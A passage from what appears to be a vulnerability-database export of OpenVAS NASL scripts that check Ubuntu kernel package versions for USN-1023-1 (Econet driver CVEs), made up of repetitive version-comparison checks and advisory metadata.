}\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-virtual-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-pae-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:34", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-3848", "CVE-2010-3849"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840544", "href": "http://plugins.openvas.org/nasl.php?oid=840544", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1023_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published 
by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1023-1/\");\n script_id(840544);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1023-1\");\n script_cve_id(\"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n 
isdpkgvuln(pkg:\"irda-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", 
rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1023.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", 
rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 